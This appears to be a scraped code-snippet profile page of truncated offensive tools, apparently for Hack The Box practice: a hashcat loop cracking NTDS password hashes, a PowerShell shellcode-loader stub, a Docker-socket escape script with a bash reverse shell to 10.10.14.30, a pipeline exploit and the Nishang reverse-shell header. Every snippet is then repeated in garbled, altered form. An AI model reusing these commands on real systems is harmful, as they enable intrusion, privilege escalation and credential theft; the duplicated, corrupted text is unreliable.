PwnPeter

## waybackurls.py
import requests
import sys
import json


def waybackurls(host, with_subs):
    if with_subs:
        url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
    else:
        url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host

## metapool-mining-alephium.sh
#!/usr/bin/env bash
# Made by opimon, svenhash
set -e

PROXY_VERSION=1.0.1
MINER_VERSION=0.5.4
MINER_VERSION_AMD=0.2.0
SCRIPT_VERSION=1.2.0

DIR=$(pwd)

## loop hashcat
for wordlist in $(\ls -1 /opt/tools/wordlists/); do hashcat ntds_clean.ntds -m 1000 -r /opt/tools/password_cracking_rules/OneRuleToRuleThemAll.rule /opt/tools/wordlists/$wordlist -O --potfile-path $wordlist.potfile -o cracked/$wordlist.out --loopback; done

## test
Set-StrictMode -Version 2

function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {

## OneRuleToRuleThemAll.rule
#########################################################
# ***       Stealthsploit's OneRuleToRuleThemAll    *** #
#       Created using top 25% performing rules from:    #
#                                                       #
#       hob064, best64, T0XICv1, toggles5,              #
#       InsidePro-PasswordsPro, rockyou-30000,          #
#       InsidePro-HashManager, d3ad0ne, dive,           #
#       unix-ninja-leetspeak, generated2, d3adhob0,     #
#       KoreLogic's Rockyou50000, _NSAKEY.v2.dive       #
#                                                       #

## exploit-docker-sock.sh
#!/bin/bash

# you can see images availables with
# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
# here we have sandbox:latest

# command executed when container is started
# change dir to tmp where the root fs is mount and execute reverse shell

cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"

## exploit-pipeline.yaml
# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

# This is for htb Worker Box :)

trigger:
- master

## rev.ps1
function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.
	import requests
	import sys
	import json


	def waybackurls(host, with_subs):
	if with_subs:
	url = 'http://web.archive.org/cdx/search/cdx?url=.%s/&output=json&fl=original&collapse=urlkey' % host
	else:
	url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
	#!/usr/bin/env bash
	# Made by opimon, svenhash
	set -e

	PROXY_VERSION=1.0.1
	MINER_VERSION=0.5.4
	MINER_VERSION_AMD=0.2.0
	SCRIPT_VERSION=1.2.0

	DIR=$(pwd)
	Set-StrictMode -Version 2

	function func_get_proc_address {
	Param ($var_module, $var_procedure)
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
	}

	function func_get_delegate_type {
	#########################################################
	# * Stealthsploit's OneRuleToRuleThemAll * #
	# Created using top 25% performing rules from: #
	# #
	# hob064, best64, T0XICv1, toggles5, #
	# InsidePro-PasswordsPro, rockyou-30000, #
	# InsidePro-HashManager, d3ad0ne, dive, #
	# unix-ninja-leetspeak, generated2, d3adhob0, #
	# KoreLogic's Rockyou50000, _NSAKEY.v2.dive #
	# #
	#!/bin/bash

	# you can see images availables with
	# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
	# here we have sandbox:latest

	# command executed when container is started
	# change dir to tmp where the root fs is mount and execute reverse shell

	cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"
	# Starter pipeline
	# Start with a minimal pipeline that you can customize to build and deploy your code.
	# Add steps that build, run tests, deploy, and more:
	# https://aka.ms/yaml

	# This is for htb Worker Box :)

	trigger:
	- master
	function Invoke-PowerShellTcp
	{
	<#
	.SYNOPSIS
	Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

	.DESCRIPTION
	This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
	Also, a standard netcat can connect to this script Bind to a specific port.